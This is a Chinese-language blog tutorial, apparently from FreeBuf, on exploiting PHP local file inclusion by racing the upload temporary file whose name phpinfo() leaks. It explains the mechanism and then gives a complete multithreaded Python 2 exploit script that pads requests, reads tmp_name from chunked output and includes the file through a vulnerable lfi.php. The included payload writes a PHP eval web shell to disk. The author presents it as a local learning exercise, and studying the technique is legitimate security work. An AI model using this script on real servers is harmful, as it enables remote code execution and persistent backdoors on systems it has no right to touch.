LFI with PHPInfo本地测试过程
原创作者:Drops@ZUT
LFI with PHPInfo是国外研究员在2001年公布的本地文件包含利用方法,作为新手,在国内却找不到完整的学习资料,经过几天的研究学习,把自己的学习过程进行总结,与大家共享。
基础知识
本地文件包含,英文Local File Include,简称LFI。文件包含是一种简化代码、提高代码重用率的方法。但是,由于没有正确处理用户输入,导致本地文件包含漏洞。黑客可以通过漏洞包含非PHP执行文件,如构造包含PHP代码的图片木马、临时文件、session文件、日志等来达到执行PHP代码的目的。
本地文件包含漏洞需要和精心构造的文件结合起来,才能发挥最大威力。这些精心构造的文件包括用户上传的文件、服务器产生的日志、session文件以及PHP程序创建的临时文件等等。尽管可以包含的文件有很多类型,但是也击中了本地文件包含的痛点–无法准确获取文件位置及文件名,只能通过猜测路径、文件名进行漏洞利用,这无疑增加了漏洞的利用难度。
进入LFI with PHPI
相关文件代码:
Phpinfo.php
<?phpphpinfo();?>
Lfi.php
<?phprequire($_GET[';load';]);?>
下面介绍利用PHPInfo信息进行本地文件包含。【你应该知道的】
一、以上传文件的方式请求任意PHP文件,服务器都会创建临时文件来保存文件内容
在HTTP协议中为了方便进行文件传输,规定了一种基于表单的HTML文件传输方法。
<form action="upload_file.php" method="post" enctype="multipart/form-data"> <label for="file">Filename:</label> <input type="file" name="file" id="file" /> <br /> <input type="submit" name="submit" value="Submit" /> </form>
其中PHP引擎对enctype=”multipart/form-data”这种请求的处理过程如下:
1、请求到达;
2、创建临时文件,并写入上传文件的内容;
3、调用相应PHP脚本进行处理,如校验名称、大小等;
4、删除临时文件。
PHP引擎会首先将文件内容保存到临时文件,然后进行相应的操作。
我们可以对phpinfo.php发起请求,查看服务端变化。由于处理时间极短,我们肉眼无法看到文件夹下临时文件的创建删除过程,可以选择sleep操作延长phpinfo脚本的时间,在慢镜头下,我们看到了生成的临时文件。其中临时文件内容正是我们POST请求中文件内容,临时文件的名称是php+随机数字.tmp,正中本地文件包含痛点。
通过刚才的实验,我们发现临时文件的生命周期很短,脚本执行完成后边删除临时文件。我们要做的就是在删除之前包含文件。下面继续。
二、PHPInfo可以输出$_FILES信息,包括临时文件路径、名称
在PHP中,有超全局变量$_FILES,保存上传文件的信息,包括文件名、类型、临时文件名、错误代号、大小。
Phpinfo()是一个无比强大的函数,可以输出大量的关于服务器的配置信息,其中包括超全局变量的值。
三、分块传输编码
通常,HTTP中的响应消息都是整个发送的,在发送之前知道Content-Lenth值,作为响应头的一部分发送给客户端。
分块传输编码,可以在不知道Content-Lenth情况下,进行分块传输,并把Content-Lenth置为chunked。PHP默认情况,当传输数据大于4KB时,采用分块传输编码。将数据分为一块或多块传输。传输格式是:
每一个非空的块都以该块包含数据的字节数(字节数以十六进制表示)开始,跟随一个CRLF (回车及换行),然后是数据本身,最后块CRLF结束。在一些实现中,块大小和CRLF之间填充有白空格(0x20)。
最后一块是单行,由块大小(0),一些可选的填充白空格,以及CRLF。
四、争取时间,在临时文件删除之前执行包含操作
利用PHPInfo进行本地文件包含的主要思想是在临时文件删除前执行操作。
我们需要争取时间,时间差大致来自三个方面:
1、通过分块传输编码,提前获知临时文件名称;
分块传输可以实现在未完全传输完成时即可获知临时文件名,可以尽早发起文件包含请求,赶在删除之前执行代码。
2、通过增加临时文件名后数据长度来延长时间;
通过观察PHPinfo的信息,在$_FILES信息下面,还有请求头的相关信息,我们可以在请求的时候,通过填充大量无用数据,来增加后面数据的长度,从而增加脚本的处理时间,为包含文件争取更多的时间。
3、通过大量请求来延迟PHP脚本的执行速度。
通过大量的并发请求,提高成功的概率。由于对PHP处理性能的不熟悉,做了一个简单的测试,记录大量多个请求下,每个脚本的运行时间,结果如下:
通过上面数据,我们可以看到脚本的运行时间有波动,当然其中应该有脚本的等待执行时间,也有很大可能降低了PHP脚本的运行能力,从而延长了时间。
Python代码:
# -*- coding: utf-8 -*-import sysimport socketimport threadingdef setup(host, port):
';';';
初始化HTTP请求数据包
TAG:校验包含是否成功标志
PAYLOAD:包含要执行的PHP代码
padding:增加数据块内容
LFIREQ:文件包含请求
REQ_DATA:POST请求数据
REQ:完整POST请求
';';';
TAG="Security Test"
PAYLOAD="""%s
<?php
$c=fopen("H:/wamp/tmp/g.php",';w';);
fwrite($c,"<?php eval(';fb';);?>");
?>\r""" % TAG
padding = "A" * 2000
LFIREQ = """GET /lfi.php?load=%(file)s HTTP/1.1\r
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36\r
Connection: keep-alive\r
Host: %(host)s\r
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r
Upgrade-Insecure-Requests: 1\n
Accept-Encoding: gzip, deflate, sdch\n
\n"""
REQ_DATA = """------WebKitFormBoundaryIYu6Un7AVVkBR0k6\r
Content-Disposition: form-data; name="file"; filename="shell.php"\r
Content-Type: application/octet-stream\r
\r
%s
------WebKitFormBoundaryIYu6Un7AVVkBR0k6\r
Content-Disposition: form-data; name="submit"\r
\r
Submit
------WebKitFormBoundaryIYu6Un7AVVkBR0k6--\r""" % PAYLOAD
REQ = """POST /phpinfo.php HTTP/1.1\r
User-Agent: """ + padding + """\r
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r
Accept-Language: """ + padding + """\r
Accept-Encoding: gzip, deflate\r
Cache-Control: max-age=0\r
Referer: """ + padding + """\r
Connection: keep-alive\r
Upgrade-Insecure-Requests: 1\r
Host: %(host)s\r
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIYu6Un7AVVkBR0k6\r
Content-Length: %(len)s\r
\r
%(data)s""" % {';host';: host, ';len';: len(REQ_DATA), ';data';: REQ_DATA}
return (REQ, TAG, LFIREQ)
def phpInfoLFI(host, port, phpinforeq, offset, lfireq, tag):
';';';
:param host: 目标主机IP
:param port: 端口
:param phpinforeq: 对phpinfo文件的请求
:param offset: 临时文件名位置
:param lfireq:文件包含请求
:param tag: 检测包含成功标志
:return: 返回完整临时文件名
';';';
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s2.connect((host, port))
s.send(phpinforeq)
d = ""
while len(d) < offset:
d += s.recv(offset)
try:
i = d.index("[tmp_name] =>")
fn = d[i+17:i+40]
except ValueError:
return None
s2.send(lfireq % {';file';: fn, ';host';: host})
d = s2.recv(4096)
s.close()
s2.close()
if d.find(tag) != -1:
return fn
counter = 0class ThreadWorker(threading.Thread):
';';';
线程操作
maxattempts:最大尝试次数
';';';
def __init__(self, e, l, m, *args):
threading.Thread.__init__(self)
self.event = e
self.lock = l
self.maxattempts = m
self.args = args
def run(self):
global counter
while not self.event.is_set():
with self.lock:
if counter >= self.maxattempts:
return
counter += 1
try:
x = phpInfoLFI(*self.args)
if self.event.is_set():
break
if x:
print "\nGot it! Shell create in H:/wamp/tmp/g.php"
self.event.set()
except socket.error:
return
def getOffset(host, port, phpinforeq):
';';';
:param host: 目标主机IP
:param port: 端口
:param phpinforeq: 对phpinfo文件的POST请求
:return:返回临时文件名在返回数据块中的位置
';';';
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.send(phpinforeq)
d = ""
while True:
i = s.recv(4096)
d += i
if i == "":
break
if i.endswith("0\r\n\r\n"):
break
s.close()
i = d.find("[tmp_name] =>")
if i == -1:
raise ValueError("No php tmp_name in phpinfo output")
print "found %s at %i" % (d[i:i+10], i)
return i+256
def main():
print "LFI with PHPinfo()"
if len(sys.argv) < 2:
print "Usage:%s host [port] [poolsz]" % sys.argv[0]
sys.exit(1)
try:
host = socket.gethostbyname(sys.argv[1])
except socket.error, e:
print "Error with hostname %s: %s" % (sys.argv[1], e)
sys.exit(1)
port = 80
try:
port = int(sys.argv[2])
except IndexError:
pass
except ValueError, e:
print "Error with port %d: %s" % (sys.argv[2], e)
sys.exit(1)
poolsz = 10
try:
poolsz = int(sys.argv[3])
except IndexError:
pass
except ValueError, e:
print "Error with poolsz %d: %s" %(sys.argv[3], e)
sys.exit(1)
print "Getting initial offset..."
phpinforeq, tag, lfireq = setup(host, port)
offset = getOffset(host, port, phpinforeq)
sys.stdout.flush()
maxattempts = 200
e = threading.Event()
l = threading.Lock()
print "Spawning worker pool (%d)..." % poolsz
sys.stdout.flush()
tp = []
for i in range(0, poolsz):
tp.append(ThreadWorker(e, l, maxattempts, host, port, phpinforeq, offset, lfireq, tag))
for t in tp:
t.start()
try:
while not e.wait(1):
if e.is_set():
break
with l:
sys.stdout.write("\r % 4d / % 4d" % (counter, maxattempts))
sys.stdout.flush()
if counter >= maxattempts:
break
if e.is_set():
print "Woot! \m/"
else:
print ":("
except KeyboardInterrupt:
print "\nTelling threads to shutdown..."
e.set()
for t in tp:
t.join()
if __name__ == "__main__":
main()
运行成功示例:
心得
在学习过程中,自己了解很多看不太懂的英文资料,验证每一句的真伪,查看配置文件,整个过程没有囫囵吞枣,而是细细的品味每一个细节。Pyhton使用socket发送HTTP请求。总是因为编码格式,导致Bad Request,\r\n让自己头大,但是当自己看到Got it的时候,自己几天的学习,终于有了结果。甚是欣慰!
本次测试只在本地进行测试,在测试过程中,把padding的值设为很小,也能执行成功,最大的尝试次数需要在20以上才能成功。面对不同的网络环境需要设置不同值。
* 作者/Drops@ZUT,属FreeBuf黑客与极客(FreeBuf.COM)原创奖励计划文章,未经许可禁止转载